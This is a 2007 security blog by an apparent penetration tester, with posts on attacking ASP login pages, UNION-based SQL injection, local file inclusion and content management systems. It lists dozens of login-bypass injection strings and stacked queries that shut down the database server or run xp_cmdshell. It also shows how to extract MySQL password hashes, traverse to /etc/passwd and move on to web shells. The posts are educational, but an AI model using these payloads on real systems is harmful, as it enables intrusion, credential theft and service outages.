what i do?

Am an Information Risk Consultant and Penetration Tester, i specialize mostly in penetrating secure networks/computer systems where i simulate an organized professional attack against your organization, where after that a detailed report with weakness and exploited vectors are summarized. This will help you gain control over your infrastructures security and maximize your protection.

Saturday, April 28, 2007

INJECTIONS, ATTACKING ASP LOGIN PAGES

Hi,

I have been looking into alot of attacks, especially the shopadmin, on the login pages and other sites using different CMS and running ASP.NET, and i have seen that most of the sites especially hosted by the ISPs, haven't just been hosted but archived, and the admins haven't even thought about how secure their login pages are. In this articles, i will share with you some logins attemps, an attacker will use, try with and gain administration.

Username: admin'--
username: ' or 1=1--

Username : admin
Password : admin' or a


Username : admin
Password : admin' or a=a --

user='' or ''=''
pass= '' or ''=''

- Login: hi' or 1=1--
- pass: hi' or 1=1--


Username: '; shutdown with nowait; --

Username: '; exec master..xp_xxx; --

Username: '; exec master..xp_cmdshell 'iisreset'; --


username = admin' or '6'='6




' or ''='

"'or''='"

'or"='

9,9,9

' or '

or 1=1?

or 1=1 --'

' or 'a'='a

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

' or 'x'='x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

Chintan ' --

Chintan " --

' OR 1=1 ?

hi' or 'a'='a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

admin' or a=a --

admin" or "a"="a

admin" or 1=1 --

admin' or 1=1 --

admin' or 'a'='a

admin') or ('a'='a

admin") or ("a"="a

These are about enough, so test your login pages and drop me a mail, incase u find these helpful.

Good weekend,

/Chuks

Wednesday, April 18, 2007

SQL INJECTIONS

This is a vulnerability alot of hackers use, when attacking webservers. By webservers in mean, applications running IIS or Apache, which are commonly used for hosting sites. This attack simply allows an attacker to alter backend SQL statements by manipulating the user input. To learn more about sql injection, there ara alot of white papers on the net that can really help. See these pages,

http://www.acunetix.com/websitesecurity/sql-injection.htm


http://www.securiteam.com/securityreviews/5NP011FIUG.html

http://www.securiteam.com/securityreviews/5IP030K8AA.html

http://unixwiz.net/techtips/sql-injection.html

http://www.owasp.org/index.php/PHP_Top_5

And many others online

lets take an example on php, aite?

Let say our site is www.sitevulnerable.com/index.php
Index php is vulnerable to sql injection. So how would we attack. www.sitevulnerable.com/index.php?id=-1

Maybe u are asking me why 1, you can use any number 1010101, wateva

The inject above may give an error, and actually these errors are the one i will use to pick up passwords, tables etc.

So we go on by enumerating the tables

www.sitevulnerable.com/index.php?id=-1 union select 1/*

We are using /* to close the query so as to grep in db.

So we will continue adding up like this until we get an output that will help us.

www.sitevulnerable.com/index.php?id=-1 union select 1,2/*

Remember with this we are just grep db of id 1, which probably is root

www.sitevulnerable.com/index.php?id=-1 union select 4,3,2,1/*

and then i get an error like

3

1


We are still rolling........

So i will inject a crafted query like this


www.sitevulnerable.com/index.php?id=-1union select 4,DATABASE(),2,USER()/*

And the error i get will be the user name in the DB.

root@localhost

So lets grep the password from the db

www.sitevulnerable.com/index.php?id=-1 union select host,host,2,password from mysql.user/*

And our error is

localhost

500372d40e775a87

Now that is an encrypted mysql hash, which can be bruteforced by using john the ripper.

Download from here


http://www.openwall.com/john/

So if i get the password, how will i log in to db and upload my files?

Simple, get a running shell, like c99shell, c100, r57 etc etc, they are all over the internet

A simple screenshot is done below.







Hope this helped, signing off,

/Chuks

Tuesday, April 17, 2007

EXPLAINING CONTENT MANAGEMENT SYSTEMS

A content management system is an application that is accessed with a webbrowser (mozilla firefox, Opera, konqueror etc) over a network like Internet or through the intranet. We actually call them webapplications.and thats where we start talking about webapplication security.

We use these webaplications for webmails, online retail sales, online auctions, wikis, weblogs, discussion boards(forums) and alot of others.

Content Management System simplifies the work of the administrators on a site, when it comes to stuff like editing processes, creating, translations, publishing, archiving and alot more better services.

Errors and bugs found are released everyday including hacked frameworks, new and zero day exploits, and people are made aware of them and patches released. To learn more about webapplication security, you can check www.webappsec.org, a site i always visit several times a day. Others are like www.owasp.org, www.spidynamics.com, www.acunetix.com, www.cgisecurity.com

Most of the Content Management Softwares i know of, are opensource, so free for anybody who wants to have a website which really sings..........

/Chuks

Thursday, April 12, 2007

LOCAL FILE INCLUSION


LOCAL FILE INCLUSION

Local file inclusion is when you view 1 of the remote systems local files through one of their web based scripts normally, e.g. victimsite.com/vulnerablescript.php?script=../../../../../../../etc/passwd? which if on a unix/Linux system will bring up the passwd file.

Its normally found in webapplications who's input isn't sanitised properly.http://www.victim.com/vulnerablescript.php=2

Now this is like a GET parameter request for 2 on the above URL. Lfi works with the following


- Nullbytes: %00
- Directory transversal: /../

Lets assume the vulnerable script looks as this;

$file=$_GET["file"]; //Get parameter
include(".vuln/$vulnerable.php") //include Get parameter with folder prefix
?>



As we all know, the GET parameter is passed to the include fuction, which then loads the file, linking up to the full path; /home/www/anotherfile/application/vulnerablescript.php

Even, as far as PHP is concerned, it has a way of allowing upload of files to the box template folder, which will turn from LFI to RFI. RFI is a short name of Remote File Inclusion. This will happen if allow_url_fopen is enabled, which due to these vulnerabilities, it will be disabled in PHP 6. You can read more about uploading in php here, http//au.php.net/manual/en/features.file-upload

So to check if our exploit works we load up the vulnerable script up the url, and feed in a LFI, check this out.....

www.victimsite.com/vulnerablescript.php=../vulnerablescript.php

......and if it reloads, the site is vulnerable to LFI

What will happen in the background is something like this

/home/www/anotherfile/application/vuln/../vulnerablescript.php

Now this is a simple directory transversal

Nullbytes come into play if .php is closed up to the file and helps to ignore everything except %00, so if u do vulnerablescript.php%00, everything after .php is ignored.

Remember most of our sites have so many security holes u would be amazed, especially if the box is in the same LAN the company or the institution is. Another way of acting gone in 60 seconds huh!

The screenshot below shows an LFI.


Will be writing more soon on websecurity.

/Chuks

Wednesday, April 11, 2007

IT SECURITY IN MY COUNTRY

Hi.

In my country computer security is not much of an issue, as far as Administration is concerned. You will find how simpler to break in and how Vulnerable big companies and Government institution networks are. So i wish to use this blog to address I.T security and Web Security as a whole. How far can a rabbit hole be and a little on Exploits and Vulnerability.